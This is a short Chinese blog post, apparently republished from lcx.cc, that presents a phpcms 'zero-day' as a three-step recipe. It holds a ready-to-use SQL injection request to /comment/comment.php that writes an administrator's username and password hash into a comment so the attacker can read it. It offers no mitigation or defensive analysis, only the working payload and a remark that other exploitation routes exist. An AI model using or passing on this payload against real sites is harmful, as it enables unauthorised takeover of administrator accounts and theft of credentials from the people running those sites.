【Oday】phpcms 0day 一枚

  • A+
所属分类:lcx

1、找到任意一篇文章发表评论并得到评论ID

【Oday】phpcms 0day 一枚

2、提交/comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23&action=vote 红色替换为评论ID

【Oday】phpcms 0day 一枚

3、重新查看评论

【Oday】phpcms 0day 一枚

漏洞成因很简单,利用方法也不止这一种,有兴趣的同学可以研究下。

文章来源于lcx.cc:【Oday】phpcms 0day 一枚

相关推荐: 【VB】VB Clipboard 系统剪贴板操作函数详解

    VB Clipboard 系统剪贴板操作函数详解,VB Clipboard 系统剪贴板操作详解,VB Clipboard 系统剪贴板操作函数,VB Clipboard 剪贴板操作函数详解,VB Clipboard 剪贴板操作函数,VB Clipboar…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: